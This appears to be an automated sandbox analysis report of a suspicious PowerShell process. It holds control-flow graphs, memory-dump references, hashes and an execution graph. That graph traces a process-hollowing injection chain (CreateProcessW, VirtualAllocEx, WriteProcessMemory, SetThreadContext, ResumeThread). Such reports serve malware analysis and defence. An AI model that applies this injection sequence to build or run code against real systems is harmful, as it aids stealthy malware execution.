                                                                                                                  control_flow_graph 257 70745f4-707463b 260 7074af2-7074b10 257->260 261 7074641-7074646 257->261 269 7074b12 260->269 270 7074b1e-7074b25 260->270 262 707465e-7074663 261->262 263 7074648-707464e 261->263 267 7074665-7074671 262->267 268 7074673 262->268 264 7074652-707465c 263->264 265 7074650 263->265 264->262 265->262 271 7074675-7074677 267->271 268->271 269->270 273 7074b27-7074b33 270->273 274 7074b35 270->274 275 7074a93-7074a9d 271->275 276 707467d-7074687 271->276 277 7074b37-7074b39 273->277 274->277 279 7074a9f-7074aa8 275->279 280 7074aab-7074ab1 275->280 276->260 278 707468d-7074692 276->278 285 7074b7b-7074b85 277->285 286 7074b3b-7074b42 277->286 283 7074694-707469a 278->283 284 70746aa-70746b8 278->284 281 7074ab7-7074ac3 280->281 282 7074ab3-7074ab5 280->282 287 7074ac5-7074aef 281->287 282->287 288 707469e-70746a8 283->288 289 707469c 283->289 284->275 300 70746be-70746dd 284->300 291 7074b87-7074b8b 285->291 292 7074b8e-7074b94 285->292 286->285 290 7074b44-7074b61 286->290 288->284 289->284 302 7074b63-7074b75 290->302 303 7074bc9-7074bce 290->303 295 7074b96-7074b98 292->295 296 7074b9a-7074ba6 292->296 301 7074ba8-7074bc6 295->301 296->301 300->275 311 70746e3-70746ed 300->311 302->285 303->302 311->260 312 70746f3-70746f8 311->312 313 7074710-7074714 312->313 314 70746fa-7074700 312->314 313->275 317 707471a-707471e 313->317 315 7074704-707470e 314->315 316 7074702 314->316 315->313 316->313 317->275 318 7074724-7074728 317->318 318->275 320 707472e-707473e 318->320 321 70747c6-7074815 320->321 322 7074744-707476b 320->322 339 707481c-707482f 321->339 327 7074785-70747b3 322->327 328 707476d-7074773 322->328 337 70747b5-70747b7 327->337 338 70747c1-70747c4 327->338 330 7074777-7074783 328->330 331 7074775 328->331 330->327 331->327 337->338 338->339 340 70748b7-7074906 339->340 341 7074835-707485c 339->341 358 707490d-7074920 340->358 346 7074876-70748a4 341->346 347 707485e-7074864 341->347 356 70748a6-70748a8 346->356 357 70748b2-70748b5 346->357 349 7074866 347->349 350 7074868-7074874 347->350 349->346 350->346 356->357 357->358 359 7074926-707494d 358->359 360 70749a8-70749f7 358->360 365 7074967-7074995 359->365 366 707494f-7074955 359->366 377 70749fe-7074a2c 360->377 375 7074997-7074999 365->375 376 70749a3-70749a6 365->376 367 7074957 366->367 368 7074959-7074965 366->368 367->365 368->365 375->376 376->377 382 7074a2f call 46b7a08 377->382 383 7074a2f call 46b7a18 377->383 384 7074a2f call 46b1bf8 377->384 385 7074a2f call 46b7c45 377->385 380 7074a34-7074a90 382->380 383->380 384->380 385->380
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q
                                                                                                                  • API String ID: 0-2862610199
                                                                                                                  • Opcode ID: e7dcefbc43f17a1df0f952260c29bd0de302aacef134a4b1f933c8f75f31e79c
                                                                                                                  • Instruction ID: 6a32d8515746b3558d6c8aaceb1e8507e0dabf349d45cf719d0e622637b0af54
                                                                                                                  • Opcode Fuzzy Hash: e7dcefbc43f17a1df0f952260c29bd0de302aacef134a4b1f933c8f75f31e79c
                                                                                                                  • Instruction Fuzzy Hash: 9991DFB0E00245ABCB14CF58C441B69BBF2BB89710F65C659F815AF390DB32EC45CB95

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 615 7071f40-7071f65 616 7071f6b-7071f70 615->616 617 7072158-7072175 615->617 618 7071f72-7071f78 616->618 619 7071f88-7071f8c 616->619 620 7071f7c-7071f86 618->620 621 7071f7a 618->621 622 7071f92-7071f94 619->622 623 7072108-7072112 619->623 620->619 621->619 627 7071f96-7071fa2 622->627 628 7071fa4 622->628 625 7072114-707211d 623->625 626 7072120-7072126 623->626 629 707212c-7072138 626->629 630 7072128-707212a 626->630 632 7071fa6-7071fa8 627->632 628->632 633 707213a-7072155 629->633 630->633 632->623 634 7071fae-7071fcd 632->634 640 7071fcf-7071fdb 634->640 641 7071fdd 634->641 642 7071fdf-7071fe1 640->642 641->642 642->623 643 7071fe7-7071fee 642->643 643->617 644 7071ff4-7071ff9 643->644 645 7072011-7072020 644->645 646 7071ffb-7072001 644->646 645->623 651 7072026-7072044 645->651 647 7072005-707200f 646->647 648 7072003 646->648 647->645 648->645 651->623 654 707204a-707206f 651->654 654->623 657 7072075-707207c 654->657 658 70720c2-70720f5 657->658 659 707207e-7072099 657->659 668 70720fc-7072105 658->668 662 70720b3-70720b7 659->662 663 707209b-70720a1 659->663 667 70720be-70720c0 662->667 665 70720a5-70720b1 663->665 666 70720a3 663->666 665->662 666->662 667->668
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9bfe53368b673219d03731d2574ed0609153bc1c4503f1bbb0b43d234859df7a
                                                                                                                  • Instruction ID: c2c07e329fa4e365431c68fe7faeb0aacc46a38d1ded2cd0432904cfe1f7c4b2
                                                                                                                  • Opcode Fuzzy Hash: 9bfe53368b673219d03731d2574ed0609153bc1c4503f1bbb0b43d234859df7a
                                                                                                                  • Instruction Fuzzy Hash: AB51D4B0B043168FCB218B688C1166EBBF2BFD5311B5581AAD604DF392DB31D981C7A5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 764 7071f24-7071f65 766 7071f6b-7071f70 764->766 767 7072158-7072175 764->767 768 7071f72-7071f78 766->768 769 7071f88-7071f8c 766->769 770 7071f7c-7071f86 768->770 771 7071f7a 768->771 772 7071f92-7071f94 769->772 773 7072108-7072112 769->773 770->769 771->769 777 7071f96-7071fa2 772->777 778 7071fa4 772->778 775 7072114-707211d 773->775 776 7072120-7072126 773->776 779 707212c-7072138 776->779 780 7072128-707212a 776->780 782 7071fa6-7071fa8 777->782 778->782 783 707213a-7072155 779->783 780->783 782->773 784 7071fae-7071fcd 782->784 790 7071fcf-7071fdb 784->790 791 7071fdd 784->791 792 7071fdf-7071fe1 790->792 791->792 792->773 793 7071fe7-7071fee 792->793 793->767 794 7071ff4-7071ff9 793->794 795 7072011-7072020 794->795 796 7071ffb-7072001 794->796 795->773 801 7072026-7072044 795->801 797 7072005-707200f 796->797 798 7072003 796->798 797->795 798->795 801->773 804 707204a-707206f 801->804 804->773 807 7072075-707207c 804->807 808 70720c2-70720f5 807->808 809 707207e-7072099 807->809 818 70720fc-7072105 808->818 812 70720b3-70720b7 809->812 813 707209b-70720a1 809->813 817 70720be-70720c0 812->817 815 70720a5-70720b1 813->815 816 70720a3 813->816 815->812 816->812 817->818
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ca78cee2f592fc97c1813e7059da9e151b349deb60f1b8a9d3c8af49aa5f0c76
                                                                                                                  • Instruction ID: 11671b58e6c3ef28f54c7ce46935f976e566c60598d995bcd2d2aadf813c2581
                                                                                                                  • Opcode Fuzzy Hash: ca78cee2f592fc97c1813e7059da9e151b349deb60f1b8a9d3c8af49aa5f0c76
                                                                                                                  • Instruction Fuzzy Hash: 6D41C5F0E043069FCB708B258C01A6E7BB2BB95311F598295DA14DF396D731D981CBA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1792927687.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_bcd000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f08a056bee85fb94ee5314229f5fc7e59c10e128539a859a998b9308875e8448
                                                                                                                  • Instruction ID: 382b2ea604b0d135ec7062c9d190891723ffa8c628f9a7755b14b0a267b29fd2
                                                                                                                  • Opcode Fuzzy Hash: f08a056bee85fb94ee5314229f5fc7e59c10e128539a859a998b9308875e8448
                                                                                                                  • Instruction Fuzzy Hash: 6801F2751083409AE7208A2DCCC4F67BFD8DF51325F18C4AEEC080B282C6799842C6B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1792927687.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_bcd000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f2f97b272cc82d5e217d3e97d94c4d6f373fb4709431b63b5bc05f674081bb8e
                                                                                                                  • Instruction ID: 2ddd22194403a2c9d7cdbe7b18a68345853bda1ee9b47ecb33c08ec0ad6c6fb7
                                                                                                                  • Opcode Fuzzy Hash: f2f97b272cc82d5e217d3e97d94c4d6f373fb4709431b63b5bc05f674081bb8e
                                                                                                                  • Instruction Fuzzy Hash: E5015E7250E3C09ED7128B258CA4B62BFA4DF52225F1980DBEC888F193C2695848C772
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-1608119003
                                                                                                                  • Opcode ID: 40b3097bd83ef5fd409508d1a2de131f82b9f723f3dda936ada62b4f546cd408
                                                                                                                  • Instruction ID: 70669c257b87b1cabfb306c967e1e63c68b14b207fff1ac468207367cb0d4c84
                                                                                                                  • Opcode Fuzzy Hash: 40b3097bd83ef5fd409508d1a2de131f82b9f723f3dda936ada62b4f546cd408
                                                                                                                  • Instruction Fuzzy Hash: 3CF138B1F0031A9FCB648B6898017AABBF6AFC5321F14866AD455CF281DF31DD46C7A1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-578306960
                                                                                                                  • Opcode ID: 1f3d08ffc8ca4a62ba8aa02f21a77656d3b5106464be9fdbab5ce330ddbb7d22
                                                                                                                  • Instruction ID: e9317502b4b7219075dc170911e521932b448117a3b54ff3460c2bad6e044cf4
                                                                                                                  • Opcode Fuzzy Hash: 1f3d08ffc8ca4a62ba8aa02f21a77656d3b5106464be9fdbab5ce330ddbb7d22
                                                                                                                  • Instruction Fuzzy Hash: 95315772B142158FD7188B298800B6ABBE5BFC5720F24866EE949CF351CA31DC44C7A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                  • API String ID: 0-1420252700
                                                                                                                  • Opcode ID: 4d31383cb7b9379008c7cfe7d467707a3ef7bae27030d10a306576a3491da7a5
                                                                                                                  • Instruction ID: b776f57c6ac473d3fea4e955b6773c203944bb04f78993f916c7a9fc78e6983d
                                                                                                                  • Opcode Fuzzy Hash: 4d31383cb7b9379008c7cfe7d467707a3ef7bae27030d10a306576a3491da7a5
                                                                                                                  • Instruction Fuzzy Hash: C9D134B1F043059FCB258A68881176ABBF6BFD6321F14C56AD905CF281DF31D982C7A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                  • API String ID: 0-1420252700
                                                                                                                  • Opcode ID: d648ad049d9f79d25c30832946a5010847a4f36df480ba65de6e89a2ede76c42
                                                                                                                  • Instruction ID: 374fe6fb98fc6ab0202b34c81a28e41960d18b9cd5965a8d33a00a9a617ab2df
                                                                                                                  • Opcode Fuzzy Hash: d648ad049d9f79d25c30832946a5010847a4f36df480ba65de6e89a2ede76c42
                                                                                                                  • Instruction Fuzzy Hash: CE8145B1F04386CFDB548B68D8446AAFBF2BF85351F1481ABD449CB291DB31C845CBA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-2125118731
                                                                                                                  • Opcode ID: ee165943de57327d4a9203f842c61de50e5093c865638a165e220d2bb9f21719
                                                                                                                  • Instruction ID: a5b90516fa5f70791a675277ae39730439414aca9e9341b88e04671c604dfcc8
                                                                                                                  • Opcode Fuzzy Hash: ee165943de57327d4a9203f842c61de50e5093c865638a165e220d2bb9f21719
                                                                                                                  • Instruction Fuzzy Hash: 34218BF1B003966BEB38856A8801B3BEED69BC4B15FA0C52A9509CF3C1CD32C841D365
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2049395529
                                                                                                                  • Opcode ID: b44745ea256f6f9cdc9c1d74c0e29731f3f14f2e330db66682a103236df8c6a6
                                                                                                                  • Instruction ID: cccb10b3a9f1cbfed3d1fe21f7bca41c71a3c0a82e1be1a22433109ba45505da
                                                                                                                  • Opcode Fuzzy Hash: b44745ea256f6f9cdc9c1d74c0e29731f3f14f2e330db66682a103236df8c6a6
                                                                                                                  • Instruction Fuzzy Hash: 2501D4A1B0E3C50FC72B12385C206592FB25B83561B2A47DFC180DF297CE194C46C3A6

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:7.7%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:61
                                                                                                                  Total number of Limit Nodes:18
                                                                                                                  execution_graph 10124 ca81c7 10125 ca819e 10124->10125 10126 ca8284 10125->10126 10129 cabc48 10125->10129 10127 ca8312 10130 cabc72 10129->10130 10131 cabc67 10129->10131 10130->10131 10134 cabd8e 10130->10134 10155 cabc48 8 API calls 10130->10155 10157 cabdf0 10130->10157 10131->10127 10132 cabd9c 10132->10127 10133 cacb25 CreateProcessW 10136 cacb99 10133->10136 10134->10132 10140 cac6e3 10134->10140 10180 ca75c4 10134->10180 10137 cabf79 10138 ca75d0 Wow64SetThreadContext 10137->10138 10137->10140 10139 cac05a 10138->10139 10139->10140 10141 cac1fc VirtualAllocEx 10139->10141 10148 cac6fe 10139->10148 10140->10133 10140->10148 10142 cac245 10141->10142 10142->10140 10144 cac2f2 VirtualAllocEx 10142->10144 10145 cac339 10142->10145 10143 ca75e8 WriteProcessMemory 10146 cac383 10143->10146 10144->10145 10145->10140 10145->10143 10145->10148 10146->10140 10147 cac58f 10146->10147 10146->10148 10153 ca75e8 WriteProcessMemory 10146->10153 10147->10140 10149 ca75e8 WriteProcessMemory 10147->10149 10148->10127 10150 cac5d7 10149->10150 10150->10140 10150->10148 10151 ca75f4 Wow64SetThreadContext 10150->10151 10152 cac68e 10151->10152 10152->10140 10152->10148 10154 cac6a3 ResumeThread 10152->10154 10153->10146 10154->10140 10155->10130 10159 cabe72 10157->10159 10158 cacb25 CreateProcessW 10161 cacb99 10158->10161 10160 ca75c4 CreateProcessW 10159->10160 10166 cac6e3 10159->10166 10162 cabf79 10160->10162 10162->10166 10184 ca75d0 10162->10184 10164 cac6fe 10164->10130 10165 cac05a 10165->10164 10165->10166 10167 cac1fc VirtualAllocEx 10165->10167 10166->10158 10166->10164 10168 cac245 10167->10168 10168->10166 10169 cac339 10168->10169 10171 cac2f2 VirtualAllocEx 10168->10171 10169->10164 10169->10166 10188 ca75e8 10169->10188 10171->10169 10172 cac58f 10172->10166 10173 ca75e8 WriteProcessMemory 10172->10173 10175 cac5d7 10173->10175 10174 cac383 10174->10164 10174->10166 10174->10172 10178 ca75e8 WriteProcessMemory 10174->10178 10175->10164 10175->10166 10192 ca75f4 10175->10192 10178->10174 10179 cac6a3 ResumeThread 10179->10166 10181 caca40 CreateProcessW 10180->10181 10183 cacb99 10181->10183 10185 cacc80 Wow64SetThreadContext 10184->10185 10187 caccfa 10185->10187 10187->10165 10189 cad1f8 WriteProcessMemory 10188->10189 10191 cad283 10189->10191 10191->10174 10193 cacc80 Wow64SetThreadContext 10192->10193 10195 cac68e 10193->10195 10195->10164 10195->10166 10195->10179
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2d219681da906813bdf9fcd9843de63ba47291d4f44632e6e388a807193f3345
                                                                                                                  • Instruction ID: 9484bff01937e5d688a8cad2665f5eefb27054bfe7e1e44df2f44ad1015f7944
                                                                                                                  • Opcode Fuzzy Hash: 2d219681da906813bdf9fcd9843de63ba47291d4f44632e6e388a807193f3345
                                                                                                                  • Instruction Fuzzy Hash: C2721938A002198FDB55EF78D8587AD7BB2BB89311F108569EA0AD7390DF744D82CF51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 71d09c8-71d09eb 1 71d0bc6-71d0c0e 0->1 2 71d09f1-71d09f6 0->2 16 71d0d7b-71d0d98 1->16 17 71d0c14-71d0c19 1->17 3 71d0a0e-71d0a12 2->3 4 71d09f8-71d09fe 2->4 8 71d0a18-71d0a1c 3->8 9 71d0b73-71d0b7d 3->9 6 71d0a00 4->6 7 71d0a02-71d0a0c 4->7 6->3 7->3 11 71d0a2f 8->11 12 71d0a1e-71d0a2d 8->12 13 71d0b7f-71d0b88 9->13 14 71d0b8b-71d0b91 9->14 15 71d0a31-71d0a33 11->15 12->15 18 71d0b97-71d0ba3 14->18 19 71d0b93-71d0b95 14->19 15->9 23 71d0a39-71d0a59 15->23 38 71d0dc9 16->38 39 71d0d9a-71d0dad 16->39 21 71d0c1b-71d0c21 17->21 22 71d0c31-71d0c35 17->22 24 71d0ba5-71d0bc3 18->24 19->24 26 71d0c25-71d0c2f 21->26 27 71d0c23 21->27 29 71d0c3b-71d0c3d 22->29 30 71d0d2a-71d0d34 22->30 56 71d0a78 23->56 57 71d0a5b-71d0a76 23->57 26->22 27->22 35 71d0c4d 29->35 36 71d0c3f-71d0c4b 29->36 32 71d0d36-71d0d3f 30->32 33 71d0d42-71d0d48 30->33 40 71d0d4e-71d0d5a 33->40 41 71d0d4a-71d0d4c 33->41 43 71d0c4f-71d0c51 35->43 36->43 47 71d0dcb-71d0dcd 38->47 48 71d0dd7-71d0df4 38->48 53 71d0dbd 39->53 54 71d0daf-71d0dbb 39->54 45 71d0d5c-71d0d78 40->45 41->45 43->30 49 71d0c57-71d0c59 43->49 47->48 63 71d0e5a-71d0e5f 48->63 64 71d0df6-71d0e07 48->64 51 71d0c69 49->51 52 71d0c5b-71d0c67 49->52 59 71d0c6b-71d0c6d 51->59 52->59 60 71d0dbf-71d0dc1 53->60 54->60 61 71d0a7a-71d0a7c 56->61 57->61 59->30 66 71d0c73-71d0c75 59->66 67 71d0e0d-71d0e17 60->67 68 71d0dc3 60->68 61->9 65 71d0a82-71d0a84 61->65 63->64 64->67 71 71d0a94 65->71 72 71d0a86-71d0a92 65->72 73 71d0c8f-71d0c93 66->73 74 71d0c77-71d0c7d 66->74 75 71d0e19-71d0e1f 67->75 76 71d0e22-71d0e28 67->76 68->38 77 71d0a96-71d0a98 71->77 72->77 84 71d0cad-71d0d27 73->84 85 71d0c95-71d0c9b 73->85 80 71d0c7f 74->80 81 71d0c81-71d0c8d 74->81 82 71d0e2e-71d0e3a 76->82 83 71d0e2a-71d0e2c 76->83 77->9 86 71d0a9e-71d0abe 77->86 80->73 81->73 87 71d0e3c-71d0e57 82->87 83->87 88 71d0c9d 85->88 89 71d0c9f-71d0cab 85->89 100 71d0ad6-71d0ada 86->100 101 71d0ac0-71d0ac6 86->101 88->84 89->84 104 71d0adc-71d0ae2 100->104 105 71d0af4-71d0af8 100->105 102 71d0ac8 101->102 103 71d0aca-71d0acc 101->103 102->100 103->100 106 71d0ae4 104->106 107 71d0ae6-71d0af2 104->107 108 71d0aff-71d0b01 105->108 106->105 107->105 109 71d0b19-71d0b70 108->109 110 71d0b03-71d0b09 108->110 112 71d0b0d-71d0b0f 110->112 113 71d0b0b 110->113 112->109 113->109
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-3310885943
                                                                                                                  • Opcode ID: 33df5081eaa3c90deb7960d48c876ad0d9e30b56b92a2d4ff7086396c64ad131
                                                                                                                  • Instruction ID: 0535c0c4b50efaabd153491e8cd1fe06967cc3dace9172d0b230c2ad63e17841
                                                                                                                  • Opcode Fuzzy Hash: 33df5081eaa3c90deb7960d48c876ad0d9e30b56b92a2d4ff7086396c64ad131
                                                                                                                  • Instruction Fuzzy Hash: 46C127B5B1430A9FDB298A39881076ABBE6AFC9715F24846AD405CF2C1DF31DD41CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 115 71d13a0-71d13c6 116 71d13cc-71d13d1 115->116 117 71d1572-71d1584 115->117 118 71d13e9-71d13ed 116->118 119 71d13d3-71d13d9 116->119 131 71d159b-71d15ba 117->131 132 71d1586-71d1599 117->132 122 71d151e-71d1528 118->122 123 71d13f3-71d13f5 118->123 120 71d13dd-71d13e7 119->120 121 71d13db 119->121 120->118 121->118 128 71d152a-71d1533 122->128 129 71d1536-71d153c 122->129 125 71d1405 123->125 126 71d13f7-71d1403 123->126 130 71d1407-71d1409 125->130 126->130 134 71d153e-71d1540 129->134 135 71d1542-71d154e 129->135 130->122 136 71d140f-71d1413 130->136 137 71d16ec-71d171d 131->137 138 71d15c0-71d15c5 131->138 132->131 139 71d1550-71d156f 134->139 135->139 141 71d1415-71d1424 136->141 142 71d1426 136->142 154 71d172d 137->154 155 71d171f-71d172b 137->155 143 71d15dd-71d15e1 138->143 144 71d15c7-71d15cd 138->144 149 71d1428-71d142a 141->149 142->149 146 71d169e-71d16a8 143->146 147 71d15e7-71d15e9 143->147 150 71d15cf 144->150 151 71d15d1-71d15db 144->151 156 71d16aa-71d16b2 146->156 157 71d16b5-71d16bb 146->157 152 71d15f9 147->152 153 71d15eb-71d15f7 147->153 149->122 158 71d1430-71d1432 149->158 150->143 151->143 163 71d15fb-71d15fd 152->163 153->163 164 71d172f-71d1731 154->164 155->164 165 71d16bd-71d16bf 157->165 166 71d16c1-71d16cd 157->166 159 71d1434-71d1440 158->159 160 71d1442 158->160 167 71d1444-71d1446 159->167 160->167 163->146 168 71d1603-71d1605 163->168 169 71d179f-71d17a9 164->169 170 71d1733-71d1752 164->170 171 71d16cf-71d16e9 165->171 166->171 167->122 172 71d144c-71d144e 167->172 175 71d161f-71d162a 168->175 176 71d1607-71d160d 168->176 173 71d17ab-71d17af 169->173 174 71d17b2-71d17b8 169->174 204 71d1754-71d1760 170->204 205 71d1762 170->205 179 71d1468-71d1473 172->179 180 71d1450-71d1456 172->180 181 71d17be-71d17ca 174->181 182 71d17ba-71d17bc 174->182 192 71d162c-71d1632 175->192 193 71d1642-71d169b 175->193 183 71d160f 176->183 184 71d1611-71d161d 176->184 189 71d1475-71d1478 179->189 190 71d1482-71d148e 179->190 187 71d1458 180->187 188 71d145a-71d1466 180->188 191 71d17cc-71d17ea 181->191 182->191 183->175 184->175 187->179 188->179 189->190 195 71d149c-71d14a3 190->195 196 71d1490-71d1492 190->196 200 71d1634 192->200 201 71d1636-71d1638 192->201 208 71d14aa-71d14ac 195->208 196->195 200->193 201->193 207 71d1764-71d1766 204->207 205->207 207->169 209 71d1768-71d1785 207->209 211 71d14ae-71d14b4 208->211 212 71d14c4-71d151b 208->212 217 71d17ed-71d17f2 209->217 218 71d1787-71d1799 209->218 214 71d14b8-71d14ba 211->214 215 71d14b6 211->215 214->212 215->212 217->218 218->169
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-3512890053
                                                                                                                  • Opcode ID: ff26dd6a215857ae0cc9d57b831269a58e56399d8da8f6fe9e6d801fa97e51a6
                                                                                                                  • Instruction ID: e117d2ed5e702500893336e6f41b8b5e3ceb15458e899192aaa2e932d39894e6
                                                                                                                  • Opcode Fuzzy Hash: ff26dd6a215857ae0cc9d57b831269a58e56399d8da8f6fe9e6d801fa97e51a6
                                                                                                                  • Instruction Fuzzy Hash: AAB12BB1B0030EEFCB2A4E69840467A7BE2AF86711F1A846AD805CB2D1DF35CC45DF61

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
